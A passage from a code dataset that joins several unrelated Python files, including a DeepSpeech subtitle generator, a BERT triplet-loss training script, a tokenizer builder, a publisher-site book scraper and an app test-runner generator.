362\nmenu_choose_scenes_260 = 363\nmenu_choose_scenes_273 = 364\nmenu_choose_scenes_286 = 365\nmenu_choose_scenes_299 = 366\nmenu_choose_scenes_312 = 367\nmenu_choose_scenes_325 = 368\nmenu_choose_scenes_338 = 369\nmenu_choose_scenes_351 = 370\nmenu_choose_scenes_364 = 371\nmenu_choose_scenes_377 = 372\nmenu_choose_scenes_390 = 373\nmenu_choose_scenes_403 = 374\nmenu_choose_scenes_416 = 375\nmenu_choose_scenes_429 = 376\nmenu_choose_scenes_442 = 377\nmenu_choose_scenes_455 = 378\nmenu_choose_scenes_468 = 379\nmenu_choose_scenes_481 = 380\nmenu_choose_scenes_494 = 381\nmenu_choose_scenes_507 = 382\nmenu_choose_scenes_520 = 383\nmenu_choose_scenes_533 = 384\nmenu_choose_scenes_546 = 385\nmenu_choose_scenes_559 = 386\nmenu_choose_scenes_572 = 387\nmenu_choose_scenes_585 = 388\nmenu_choose_scenes_598 = 389\nmenu_choose_scenes_611 = 390\nmenu_choose_scenes_624 = 391\nmenu_choose_scenes_637 = 392\nmenu_choose_scenes_650 = 393\nmenu_choose_scenes_663 = 394\nmenu_choose_scenes_676 = 395\nmenu_choose_scenes_689 = 396\nmenu_choose_scenes_702 = 397\nmenu_choose_scenes_715 = 398\n","sub_path":"ID files/ID_menus.py","file_name":"ID_menus.py","file_ext":"py","file_size_in_byte":13051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"485616281","text":"import sys\nimport os\nimport os.path\nfrom encode_manager import File\n\nclass Runtime:\n\n def __init__(self):\n\n self.dir_path = os.path.dirname(os.path.realpath(__file__))\n\n def run(self):\n \n answer = input(\"What File would you like to work with? \\n Enter the complete path from root --> \")\n\n check = input(f\"are you sure that \\\"{answer}\\\" is the desired path? [y/n] \")\n\n if check == \"n\":\n pass\n #restart\n\n if check != \"y\":\n print(\"Please enter a known response, goodbye.....\")\n #restart\n\n else:\n if os.path.isfile(answer) is False:\n \n raise ValueError(\"Requested file does not exist....\")\n \n sys.exit()\n \n self.file_session = File(answer)\n \n\n while True:\n \n req_action = input(\"what would you like to do? [encode, read, exit] \")\n \n if req_action == \"encode\":\n self.file_session.encode()\n break\n\n if req_action == \"read\":\n self.file_session.pprint()\n break\n\n if req_action == \"exit\":\n sys.exit()\n \n else:\n print(\"Unknown request, please try again (exact wording is important)\")","sub_path":"session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"371364619","text":"import os\nimport tokenizers\nimport json\n\ndef train_tokenizer():\n filepath_vocab = './data/pretrain_wo_aug.txt'\n bwpt = tokenizers.BertWordPieceTokenizer(vocab=None)\n bwpt.train(\n files=[filepath_vocab],\n min_frequency=2,\n limit_alphabet=1000,\n )\n bwpt.save('./data/vocab.json')\n\ndef save_vocab(json_path, vocab_path):\n with open(json_path, 'r') as load_f:\n load_dict = json.load(load_f)\n \n with open(vocab_path, 'w', encoding='utf-8') as writer:\n for vocab in load_dict['model']['vocab']:\n writer.write(vocab + '\\n')\n print('save successfully!')\n\nif __name__ == '__main__':\n train_tokenizer()\n json_path = './data/vocab.json'\n vocab_path = './data/vocab.txt'\n save_vocab(json_path, vocab_path)","sub_path":"project_submit/build_vocab.py","file_name":"build_vocab.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"216216459","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport wave\nimport shutil\nimport argparse\nimport subprocess\nimport numpy as np\nfrom tqdm import tqdm\nfrom deepspeech import Model, version\nfrom segmentAudio import silenceRemoval\nfrom audioProcessing import extract_audio, convert_samplerate\nfrom writeToFile import write_to_file\n\n# Line count for SRT file\nline_count = 0\n\ndef sort_alphanumeric(data):\n \"\"\"Sort function to sort os.listdir() alphanumerically\n Helps to process audio files sequentially after splitting\n\n Args:\n data : file name\n \"\"\"\n\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n\n return sorted(data, key = alphanum_key)\n\n\ndef ds_process_audio(ds, audio_file, file_handle, vtt, split_duration):\n \"\"\"Run DeepSpeech inference on each audio file generated after silenceRemoval\n and write to file pointed by file_handle\n\n Args:\n ds : DeepSpeech Model\n audio_file : audio file\n file_handle : file handle\n vtt: Is Video Text Tracks format\n split_duration: for long audio segments, split the subtitle based on this number of seconds\n \"\"\"\n\n global line_count\n fin = wave.open(audio_file, 'rb')\n fs_orig = fin.getframerate()\n desired_sample_rate = ds.sampleRate()\n\n # Check if sampling rate is required rate (16000)\n # won't be carried out as FFmpeg already converts to 16kHz\n if fs_orig != desired_sample_rate:\n print(\"Warning: original sample rate ({}) is different than {}hz. Resampling might \\\n produce erratic speech recognition\".format(fs_orig, desired_sample_rate), file=sys.stderr)\n audio = convert_samplerate(audio_file, desired_sample_rate)\n else:\n audio = np.frombuffer(fin.readframes(fin.getnframes()), np.int16)\n\n fin.close()\n\n # Perform inference on audio segment\n metadata = ds.sttWithMetadata(audio)\n\n # File name contains start and end times in seconds. Extract that\n limits = audio_file.split(os.sep)[-1][:-4].split(\"_\")[-1].split(\"-\")\n\n # Run-on sentences are inferred as a single block, so write the sentence out as multiple separate lines\n # based on a user-provided split duration.\n current_token_index = 0\n split_start_index = 0\n previous_end_time = 0\n # timestamps of word boundaries\n cues = [float(limits[0])]\n num_tokens = len(metadata.transcripts[0].tokens)\n # Walk over each character in the current audio segment's inferred text\n while current_token_index < num_tokens:\n token = metadata.transcripts[0].tokens[current_token_index]\n # If at a word boundary, get the timestamp for VTT cue data\n if token.text == \" \":\n cues += [float(limits[0]) + token.start_time]\n # time duration is exceeded and at the next word boundary\n needs_split = ((token.start_time - previous_end_time) > split_duration) and token.text == \" \"\n is_final_character = current_token_index+1 == num_tokens\n # Write out the line\n if needs_split or is_final_character:\n # Determine the timestamps\n split_limits = [float(limits[0]) + previous_end_time, float(limits[0]) + token.start_time]\n # Convert character list to string. Upper bound has plus 1 as python list slices are [inclusive, exclusive]\n split_inferred_text = ''.join([x.text for x in metadata.transcripts[0].tokens[split_start_index:current_token_index+1]])\n write_to_file(file_handle, split_inferred_text, line_count, split_limits, vtt, cues)\n # Reset and update indexes for the next subtitle split\n previous_end_time = token.start_time\n split_start_index = current_token_index + 1\n cues = [float(limits[0])]\n line_count += 1\n current_token_index += 1\n\n\ndef main():\n global line_count\n print(\"AutoSub\\n\")\n\n parser = argparse.ArgumentParser(description=\"AutoSub\")\n parser.add_argument('--file', required=True,\n help='Input video file')\n parser.add_argument('--vtt', dest=\"vtt\", action=\"store_true\",\n help='Output a vtt file with cue points for individual words instead of a srt file')\n parser.add_argument('--split-duration', type=float, help='Split run-on sentences exceededing this duration (in seconds) into multiple subtitles', default=5)\n args = parser.parse_args()\n\n for x in os.listdir():\n if x.endswith(\".pbmm\"):\n print(\"Model: \", os.path.join(os.getcwd(), x))\n ds_model = os.path.join(os.getcwd(), x)\n if x.endswith(\".scorer\"):\n print(\"Scorer: \", os.path.join(os.getcwd(), x))\n ds_scorer = os.path.join(os.getcwd(), x)\n\n # Load DeepSpeech model\n try:\n ds = Model(ds_model)\n except:\n print(\"Invalid model file. Exiting\\n\")\n sys.exit(1)\n\n try:\n ds.enableExternalScorer(ds_scorer)\n except:\n print(\"Invalid scorer file. Running inference using only model file\\n\")\n\n if os.path.isfile(args.file):\n input_file = args.file\n print(\"\\nInput file:\", input_file)\n else:\n print(args.file, \": No such file exists\")\n sys.exit(1)\n\n base_directory = os.getcwd()\n output_directory = os.path.join(base_directory, \"output\")\n audio_directory = os.path.join(base_directory, \"audio\")\n video_file_name = input_file.split(os.sep)[-1].split(\".\")[0]\n audio_file_name = os.path.join(audio_directory, video_file_name + \".wav\")\n srt_file_name = os.path.join(output_directory, video_file_name + \".srt\")\n srt_extension = \".srt\" if not args.vtt else \".vtt\"\n srt_file_name = os.path.join(output_directory, video_file_name + srt_extension)\n\n # Clean audio/ directory\n shutil.rmtree(audio_directory)\n os.mkdir(audio_directory)\n\n # Extract audio from input video file\n extract_audio(input_file, audio_file_name)\n\n print(\"Splitting on silent parts in audio file\")\n silenceRemoval(audio_file_name)\n\n # Output SRT or VTT file\n file_handle = open(srt_file_name, \"a+\")\n file_handle.seek(0)\n\n if args.vtt:\n file_handle.write(\"WEBVTT\\n\")\n file_handle.write(\"Kind: captions\\n\\n\")\n\n print(\"\\nRunning inference:\")\n\n for file in tqdm(sort_alphanumeric(os.listdir(audio_directory))):\n audio_segment_path = os.path.join(audio_directory, file)\n\n # Dont run inference on the original audio file\n if audio_segment_path.split(os.sep)[-1] != audio_file_name.split(os.sep)[-1]:\n ds_process_audio(ds, audio_segment_path, file_handle, args.vtt, split_duration=args.split_duration)\n\n if not args.vtt:\n print(\"\\nSRT file saved to\", srt_file_name)\n else:\n print(\"\\nVTT file saved to\", srt_file_name)\n\n print(\"\\nSRT file saved to\", srt_file_name)\n file_handle.close()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"autosub/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"81301681","text":"import time\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle as pkl\r\n\r\nimport tensorflow as tf\r\nimport tf_ver2_bert_network as bert\r\n\r\n# Define the weight update step for multiple sub-batches. #\r\n#@tf.function\r\ndef sub_batch_train_step(\r\n model, sub_batch_sz, \r\n x_anchor, x_positive, x_negative, optimizer, \r\n learning_rate=1.0e-3, grad_clip=1.0, alpha=5.0):\r\n optimizer.lr.assign(learning_rate)\r\n \r\n batch_size = x_anchor.shape[0]\r\n if batch_size <= sub_batch_sz:\r\n sub_batch = 1\r\n elif batch_size % sub_batch_sz == 0:\r\n sub_batch = int(batch_size / sub_batch_sz)\r\n else:\r\n sub_batch = int(batch_size / sub_batch_sz) + 1\r\n \r\n model_params = model.trainable_variables\r\n acc_gradients = [\r\n tf.zeros_like(var) for var in model_params]\r\n \r\n tot_losses = 0.0\r\n for n_sub in range(sub_batch):\r\n id_st = n_sub*sub_batch_sz\r\n if n_sub != (sub_batch-1):\r\n id_en = (n_sub+1)*sub_batch_sz\r\n else:\r\n id_en = batch_size\r\n \r\n tmp_anchor = x_anchor[id_st:id_en, :]\r\n tmp_positive = x_positive[id_st:id_en, :]\r\n tmp_negative = x_negative[id_st:id_en, :]\r\n \r\n with tf.GradientTape() as grad_tape:\r\n embed_anc = model(\r\n tmp_anchor, training=True)[1][:, 0, :]\r\n embed_pos = model(\r\n tmp_positive, training=True)[1][:, 0, :]\r\n embed_neg = model(\r\n tmp_negative, training=True)[1][:, 0, :]\r\n \r\n # Triplet loss. #\r\n tmp_pos_dist = tf.reduce_mean(tf.square(\r\n embed_anc - embed_pos), axis=1)\r\n tmp_neg_dist = tf.reduce_mean(tf.square(\r\n embed_anc - embed_neg), axis=1)\r\n triplet_loss = tf.maximum(\r\n 0.0, tmp_pos_dist - tmp_neg_dist + alpha)\r\n \r\n tmp_losses = tf.reduce_sum(triplet_loss)\r\n# tmp_losses = tf.reduce_sum(tf.reduce_sum(\r\n# tf.nn.sparse_softmax_cross_entropy_with_logits(\r\n# labels=tmp_output, logits=output_logits), axis=1))\r\n \r\n # Accumulate the gradients. #\r\n tot_losses += tmp_losses\r\n tmp_gradients = grad_tape.gradient(\r\n tmp_losses, model_params)\r\n acc_gradients = [tf.add(\r\n acc_grad, grad) for acc_grad, grad \\\r\n in zip(acc_gradients, tmp_gradients)]\r\n \r\n # Update using the optimizer. #\r\n average_loss = tot_losses / batch_size\r\n acc_gradients = [tf.math.divide_no_nan(\r\n acc_grad, batch_size) for acc_grad in acc_gradients]\r\n \r\n clipped_gradients, _ = tf.clip_by_global_norm(\r\n acc_gradients, grad_clip)\r\n optimizer.apply_gradients(\r\n zip(clipped_gradients, model_params))\r\n return average_loss\r\n\r\n# Model Parameters. #\r\nbatch_size = 256\r\nsub_batch = 64\r\nseq_length = 30\r\nnum_heads = 4\r\nnum_layers = 3\r\n\r\ngradient_clip = 1.00\r\nmaximum_iter = 3000\r\nrestore_flag = True\r\nsave_step = 500\r\nwarmup_steps = 2000\r\ndisplay_step = 50\r\nanneal_step = 2500\r\nanneal_rate = 0.75\r\n\r\nprob_keep = 0.9\r\nhidden_size = 256\r\nffwd_size = 4*hidden_size\r\nwarmup_flag = True\r\ncooling_step = 500\r\n\r\nmodel_ckpt_dir = \"../../TF_Models/bert_reddit\"\r\ntrain_loss_file = \"train_loss_bert_reddit.csv\"\r\n\r\n# Load the data. #\r\ntmp_pkl_file = \\\r\n \"C:/Users/admin/Desktop/Codes/reddit_jokes.pkl\"\r\nwith open(tmp_pkl_file, \"rb\") as tmp_load_file:\r\n full_data = pkl.load(tmp_load_file)\r\n idx2word = pkl.load(tmp_load_file)\r\n word2idx = pkl.load(tmp_load_file)\r\n\r\nvocab_size = len(word2idx)\r\nprint(\"Vocabulary Size:\", str(vocab_size)+\".\")\r\n\r\ntmp_data = []\r\nfor tmp_row in full_data:\r\n if len(tmp_row.split(\" \")) > 1 and \\\r\n len(tmp_row.split(\" \")) <= seq_length:\r\n tmp_data.append(tmp_row)\r\n\r\nnum_data = len(tmp_data)\r\nSOS_token = word2idx[\"SOS\"]\r\nEOS_token = word2idx[\"EOS\"]\r\nPAD_token = word2idx[\"PAD\"]\r\nUNK_token = word2idx[\"UNK\"]\r\nprint(\"Total of\", str(len(tmp_data)), \"rows loaded.\")\r\n\r\n# Set the number of threads to use. #\r\ntf.config.threading.set_intra_op_parallelism_threads(1)\r\ntf.config.threading.set_inter_op_parallelism_threads(1)\r\n\r\n# Build the Transformer. #\r\nprint(\"Building the BERT Model.\")\r\nstart_time = time.time()\r\n\r\nbert_model = bert.BERT_Network(\r\n num_layers, num_heads, \r\n hidden_size, ffwd_size, word2idx, \r\n seq_length+2, p_keep=prob_keep)\r\nbert_optim = tf.keras.optimizers.Adam(\r\n beta_1=0.9, beta_2=0.98, epsilon=1.0e-9)\r\n\r\nelapsed_time = (time.time()-start_time) / 60\r\nprint(\"BERT Model Built\", \"(\" + str(elapsed_time) + \" mins).\")\r\n\r\n# Create the model checkpoint. #\r\nckpt = tf.train.Checkpoint(\r\n step=tf.Variable(0), \r\n bert_model=bert_model, \r\n bert_optim=bert_optim)\r\n\r\nmanager = tf.train.CheckpointManager(\r\n ckpt, model_ckpt_dir, max_to_keep=1)\r\n\r\nif restore_flag:\r\n ckpt.restore(manager.latest_checkpoint)\r\n if manager.latest_checkpoint:\r\n print(\"Model restored from {}\".format(\r\n manager.latest_checkpoint))\r\n else:\r\n print(\"Error: No latest checkpoint found.\")\r\n \r\n train_loss_df = pd.read_csv(train_loss_file)\r\n train_loss_list = [tuple(\r\n train_loss_df.iloc[x].values) \\\r\n for x in range(len(train_loss_df))]\r\nelse:\r\n print(\"Training a new model.\")\r\n train_loss_list = []\r\n\r\n# Train the Transformer model. #\r\ntmp_seq_anc = np.zeros(\r\n [batch_size, seq_length+2], dtype=np.int32)\r\ntmp_seq_pos = np.zeros(\r\n [batch_size, seq_length+2], dtype=np.int32)\r\ntmp_seq_neg = np.zeros(\r\n [batch_size, seq_length+2], dtype=np.int32)\r\n\r\ntmp_test_anc = np.zeros(\r\n [1, seq_length+2], dtype=np.int32)\r\ntmp_test_pos = np.zeros(\r\n [1, seq_length+2], dtype=np.int32)\r\ntmp_test_neg = np.zeros(\r\n [1, seq_length+2], dtype=np.int32)\r\n\r\n# Warmup learning schedule. #\r\nn_iter = ckpt.step.numpy().astype(np.int32)\r\nif warmup_flag:\r\n step_min = float(max(n_iter, warmup_steps))**(-0.5)\r\n learning_rate = float(hidden_size)**(-0.5) * step_min\r\nelse:\r\n initial_lr = 0.001\r\n anneal_pow = int(n_iter / anneal_step)\r\n learning_rate = max(np.power(\r\n anneal_rate, anneal_pow) * initial_lr, 1.0e-5)\r\n\r\nprint(\"-\" * 50)\r\nprint(\"Training the BERT Network\", \r\n \"(\" + str(n_iter) + \" iterations).\")\r\nprint(str(num_data), \"training samples.\")\r\nprint(\"-\" * 50)\r\n\r\n# Update the neural network's weights. #\r\ntot_loss = 0.0\r\nstart_tm = time.time()\r\nwhile n_iter < maximum_iter:\r\n if warmup_flag:\r\n step_min = float(max(n_iter, warmup_steps))**(-0.5)\r\n learning_rate = float(hidden_size)**(-0.5) * step_min\r\n else:\r\n if n_iter % anneal_step == 0:\r\n anneal_pow = int(n_iter / anneal_step)\r\n learning_rate = max(np.power(\r\n anneal_rate, anneal_pow) * initial_lr, 1.0e-6)\r\n \r\n # Select a sample from the data. #\r\n batch_sample = np.random.choice(\r\n num_data, size=batch_size, replace=False)\r\n batch_add_int = np.random.randint(\r\n 1, num_data, size=batch_size)\r\n \r\n # For simplicity, take SOS to be CLS. #\r\n tmp_seq_anc[:, :] = PAD_token\r\n tmp_seq_pos[:, :] = PAD_token\r\n tmp_seq_neg[:, :] = PAD_token\r\n \r\n tmp_seq_anc[:, 0] = SOS_token\r\n tmp_seq_pos[:, 0] = SOS_token\r\n tmp_seq_neg[:, 0] = SOS_token\r\n \r\n for n_index in range(batch_size):\r\n tmp_index1 = batch_sample[n_index]\r\n tmp_index2 = \\\r\n (tmp_index1 + batch_add_int[n_index]) % num_data\r\n \r\n tmp_p_tok1 = tmp_data[tmp_index1].split(\" \")\r\n tmp_p_tok2 = tmp_data[tmp_index2].split(\" \")\r\n tmp_p_idx1 = [word2idx.get(\r\n x, UNK_token) for x in tmp_p_tok1]\r\n tmp_p_idx2 = [word2idx.get(\r\n x, UNK_token) for x in tmp_p_tok2]\r\n \r\n n_input1 = len(tmp_p_idx1) + 1\r\n n_input2 = len(tmp_p_idx2) + 1\r\n \r\n # Randomly sample the positive input #\r\n # to be used as the anchor. #\r\n num_sample = np.random.randint(1, n_input1-1)\r\n tmp_sample = list(sorted(list(\r\n np.random.permutation(n_input1-1)[:num_sample])))\r\n \r\n tmp_p_anc = list(\r\n np.array(tmp_p_idx1)[tmp_sample])\r\n n_anchor = len(tmp_p_anc) + 1\r\n del tmp_sample, num_sample\r\n \r\n tmp_seq_anc[n_index, 1:n_anchor] = tmp_p_anc\r\n tmp_seq_pos[n_index, 1:n_input1] = tmp_p_idx1\r\n tmp_seq_neg[n_index, 1:n_input2] = tmp_p_idx2\r\n \r\n tmp_seq_anc[n_index, n_anchor] = EOS_token\r\n tmp_seq_pos[n_index, n_input1] = EOS_token\r\n tmp_seq_neg[n_index, n_input2] = EOS_token\r\n \r\n tmp_loss = sub_batch_train_step(\r\n bert_model, sub_batch, \r\n tmp_seq_anc, tmp_seq_pos, tmp_seq_neg, \r\n bert_optim, learning_rate=learning_rate)\r\n\r\n n_iter += 1\r\n ckpt.step.assign_add(1)\r\n \r\n tot_loss += tmp_loss.numpy()\r\n if n_iter % display_step == 0:\r\n end_tm = time.time()\r\n \r\n avg_loss = tot_loss / display_step\r\n tot_loss = 0.0\r\n elapsed_tm = (end_tm - start_tm) / 60\r\n \r\n tmp_test_anc[:, :] = PAD_token\r\n tmp_test_pos[:, :] = PAD_token\r\n tmp_test_neg[:, :] = PAD_token\r\n \r\n tmp_test_anc[:, 0] = SOS_token\r\n tmp_test_pos[:, 0] = SOS_token\r\n tmp_test_neg[:, 0] = SOS_token\r\n \r\n sample_add = np.random.randint(\r\n 1, num_data, size=1)\r\n sample_pos = np.random.choice(num_data, size=1)\r\n sample_neg = (sample_pos + sample_add) % num_data\r\n \r\n tmp_in_pos = tmp_data[sample_pos[0]]\r\n tmp_in_neg = tmp_data[sample_neg[0]]\r\n \r\n tmp_p_pos = [word2idx.get(\r\n x, UNK_token) for x in tmp_in_pos.split(\" \")]\r\n tmp_p_neg = [word2idx.get(\r\n x, UNK_token) for x in tmp_in_neg.split(\" \")]\r\n \r\n n_pos_toks = len(tmp_p_pos) + 1\r\n n_neg_toks = len(tmp_p_neg) + 1\r\n num_sample = np.random.randint(1, n_pos_toks-1)\r\n tmp_sample = list(sorted(list(\r\n np.random.permutation(n_pos_toks-1)[:num_sample])))\r\n tmp_in_anc = tmp_in_pos.split(\" \")\r\n tmp_in_anc = \" \".join(\r\n [tmp_in_anc[x] for x in tmp_sample])\r\n \r\n tmp_p_anc = list(\r\n np.array(tmp_p_pos)[tmp_sample])\r\n n_anc_toks = len(tmp_p_anc) + 1\r\n del tmp_sample, num_sample\r\n \r\n tmp_test_anc[0, 1:n_anc_toks] = tmp_p_anc\r\n tmp_test_pos[0, 1:n_pos_toks] = tmp_p_pos\r\n tmp_test_neg[0, 1:n_neg_toks] = tmp_p_neg\r\n \r\n tmp_test_anc[0, n_anc_toks] = EOS_token\r\n tmp_test_pos[0, n_pos_toks] = EOS_token\r\n tmp_test_neg[0, n_neg_toks] = EOS_token\r\n \r\n tmp_anc_emb = bert_model(\r\n tmp_test_anc, training=False)[1][:, 0, :]\r\n tmp_pos_emb = bert_model(\r\n tmp_test_pos, training=False)[1][:, 0, :]\r\n tmp_neg_emb = bert_model(\r\n tmp_test_neg, training=False)[1][:, 0, :]\r\n del sample_pos, sample_neg, sample_add\r\n del n_pos_toks, n_neg_toks, n_anc_toks\r\n \r\n pos_dist = tf.reduce_mean(tf.square(\r\n tmp_anc_emb - tmp_pos_emb), axis=1)[0]\r\n neg_dist = tf.reduce_mean(tf.square(\r\n tmp_anc_emb - tmp_neg_emb), axis=1)[0]\r\n \r\n print(\"Iteration\", str(n_iter)+\".\")\r\n print(\"Elapsed Time:\", str(elapsed_tm), \"mins.\")\r\n print(\"Gradient Clip:\", str(gradient_clip) + \".\")\r\n print(\"Learning Rate:\", str(learning_rate) + \".\")\r\n print(\"Average Loss:\", str(avg_loss) + \".\")\r\n print(\"\")\r\n \r\n print(\"Anchor:\", tmp_in_anc)\r\n print(\"Positive:\", tmp_in_pos)\r\n print(\"Positive Dist:\", str(pos_dist.numpy()))\r\n print(\"Negative:\", tmp_in_neg)\r\n print(\"Negative Dist:\", str(neg_dist.numpy()))\r\n \r\n train_loss_list.append((n_iter, avg_loss))\r\n start_tm = time.time()\r\n print(\"-\" * 50)\r\n \r\n # Save the model. #\r\n if n_iter % save_step == 0:\r\n # Save the model. #\r\n save_path = manager.save()\r\n print(\"Saved model to {}\".format(save_path))\r\n \r\n tmp_df_losses = pd.DataFrame(\r\n train_loss_list, columns=[\"n_iter\", \"xent_loss\"])\r\n tmp_df_losses.to_csv(train_loss_file, index=False)\r\n del tmp_df_losses\r\n \r\n # Cool the GPU. #\r\n if n_iter % cooling_step == 0:\r\n print(\"Cooling GPU for 2 minutes.\")\r\n time.sleep(120)\r\n print(\"Resume Training.\")\r\n print(\"-\" * 50)\r\n\r\n","sub_path":"train_reddit_jokes_tf_ver2_bert_triplet.py","file_name":"train_reddit_jokes_tf_ver2_bert_triplet.py","file_ext":"py","file_size_in_byte":12494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165543104","text":"import requests\nimport math\n\n# 1、取得所有大类的API:https://www.ptpress.com.cn/bookinfo/getFirstParent GET 无参数\n\n# 2、取得大类下面的小类API:https://www.ptpress.com.cn/bookinfo/getBookTagByParentId POST 参数\n# parentId: a15a734f-0ae9-41d7-9012-6ef9de2e71c8\n\n# 3、书籍列表API:https://www.ptpress.com.cn/bookinfo/getBookListForEBTag POST 参数\n# page: 1\n# rows: 18\n# bookTagId: a15a734f-0ae9-41d7-9012-6ef9de2e71c8\n# orderStr: hot\n\n# 4、书籍详情API:https://www.ptpress.com.cn/bookinfo/getBookDetailsById\n# bookId: b255ec08-2a95-4c21-b58b-432f4ebbc1fa\n\nsession = requests.session()\n\nparentCategoryUrl = \"https://www.ptpress.com.cn/bookinfo/getFirstParent\"\n\nsubCategoryUrl = \"https://www.ptpress.com.cn/bookinfo/getBookTagByParentId\"\n\nbookListUrl = \"https://www.ptpress.com.cn/bookinfo/getBookListForEBTag\"\n\nbookDetailUrl = \"https://www.ptpress.com.cn/bookinfo/getBookDetailsById\"\n\n\nresponse = session.get(url=parentCategoryUrl)\n\nif response.status_code != 200:\n raise Exception(\"父类目录估计有什么反爬措施,请添加相应的防反爬措施!!!\")\nfor parentTag in response.json()[\"data\"]:\n print(parentTag[\"tagId\"], parentTag[\"tagName\"])\n data = {\n \"parentId\": parentTag[\"tagId\"]\n }\n response = session.post(url=subCategoryUrl, data=data)\n if response.status_code != 200:\n raise Exception(\"子类目录估计有什么反爬措施,请添加相应的防反爬措施!!!\")\n for subTag in response.json()[\"data\"]:\n print(subTag[\"tagId\"], subTag[\"tagName\"])\n data = {\n \"page\": 1,\n \"rows\": 18,\n \"bookTagId\": subTag[\"tagId\"],\n \"orderStr\": \"hot\"\n }\n response = session.post(url=bookListUrl, data=data)\n if response.status_code != 200:\n raise Exception(\"书籍列表估计有什么反爬措施,请添加相应的防反爬措施!!!\")\n bookCount = int(response.json()[\"data\"][\"total\"])\n maxPage = math.ceil(bookCount / 18)\n for page in range(1, maxPage + 1):\n data[\"page\"] = page\n response = session.post(url=bookListUrl, data=data)\n print(response.json())\n\n\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"586229360","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\nimport sys\nimport wave\nimport io\n\nfrom deepspeech import Model\nfrom timeit import default_timer as timer\n\n\nclass SpeechRecognizer:\n def __init__(self, model):\n print('Loading model from file {}'.format(model), file=sys.stderr)\n model_load_start = timer()\n self.ds = Model(model)\n model_load_end = timer() - model_load_start\n print('Loaded model in {:.3}s.'.format(model_load_end), file=sys.stderr)\n self.desired_sample_rate = self.ds.sampleRate()\n\n def recognize(self, audio):\n result = {'error': '', 'text': '', 'inference_length': 0, 'audio_length': 0}\n fin = wave.open(io.BytesIO(audio), 'rb')\n fs_orig = fin.getframerate()\n if fs_orig != self.desired_sample_rate:\n result['error'] = 'Error: original sample rate ({}) is different than {}hz'.format(fs_orig, self.desired_sample_rate)\n return result\n else:\n audio = np.frombuffer(fin.readframes(fin.getnframes()), np.int16)\n\n audio_length = fin.getnframes() * (1 / fs_orig)\n fin.close()\n\n inference_start = timer()\n # stream = self.ds.createStream()\n # stream.\n text = self.ds.stt(audio)\n result['text'] = text\n inference_end = timer() - inference_start\n result['inference_length'] = inference_end\n result['audio_length'] = audio_length\n return result\n\n\n# a = SpeechRecognizer('deepspeech-0.7.0-models.pbmm')\n# print(a.recognize('sample5.wav'))\n# a.recognize('sample1.wav')\n","sub_path":"SpeechRecognition/DeepSpeech/speech_recognizer.py","file_name":"speech_recognizer.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"592288058","text":"#coding=utf-8\n#-------------------------------------------------------------------------------------------\n#作者:吴俊威 日期:2019年1月\n#内容:即有生活脚本生成与运行\n#--------------------------------------------------------------------------------------------\nfrom run_main import *\nfrom mobiletest.appcomm import *\nfrom common.fun_t import *\n\ndef live_run_test(getid,uname,marknum):\n Log().info(\"即有生活开始执行\")\n try:\n markval=\"live_\"+str(uname)+\"_\"+str(getid)+\"_\"+str(marknum)\n con_name,con_num,pc_type,pc_ip = getrun_db(getid)\n delpath=PATH(\"../livecase\")\n filename = 'test_sh_'+str(uname)+\"_\"+str(getid)\n del_files(delpath,filename)\n time.sleep(2)\n try:\n lgetparam,lparamcount = lparam_db(uname)\n print(\"统计行:%s\"%lparamcount)\n count_sys = 0\n for i in range(lparamcount):\n try:\n filep = PATH(\"../livecase/test_sh_\")+str(uname)+\"_\"+str(getid)+\"_\"+str(i)+\".py\"\n remove_lines(PATH(\"../jy_case/jylive_temp.py\"),filep,\"#默认误删\")\n with open(filep,'r',encoding='UTF-8') as ui:\n data = ui.readlines()\n for inx,line in enumerate(data):\n if inx == 21:\n val = str(\"pc_type=\")+\"\\\"\"+str(pc_type)+\"\\\"\"+\"\\n\"+str(\"pc_ip=\")+\"\\\"\"+str(pc_ip)+\"\\\"\"+\"\\n\"+str(\"lgetparam=\")+str(lgetparam[i])+\"\\n\"+str(\"class jyliveCase_\")+str(uname)+\"_\"+str(getid)+\"_\"+str(i+1)+str(\"(unittest.TestCase):\")+\"\\n\"\n data[inx] = val\n else:\n data[inx] = line\n with open(filep,'w',encoding='UTF-8') as oi:\n oi.writelines(data)\n except Exception as e:\n print(e)\n count_sys = count_sys+i+1\n print(count_sys)\n time.sleep(2)\n all_case = add_case(caseName=\"livecase\", rule=\"test*.py\")\n run_casenew(all_case,\"result_live.html\")\n # report_path = os.path.join(cur_path, \"report\") # 用例文件夹\n report_path1 = PATH(\"../report\")\n print(report_path1)\n report_file = get_reportfile(report_path1,'result_live.html')\n print(report_file)\n shutil.copyfile(report_file,os.path.join(cur_path, \"jylive/templates/result_live.html\"))\n if count_sys > 0:\n run_sat = \"ok\"\n else:\n run_sat = \"fail\"\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n run_sat = \"fail\"\n return run_sat,markval\n\n\n\n\n\nif __name__ == \"__main__\":\n cur_path1 = os.path.dirname(os.path.realpath(__file__))\n cur_path = os.path.abspath(os.path.dirname(os.getcwd())+os.path.sep+\".\")\n # print(cur_path1,cur_path)\n 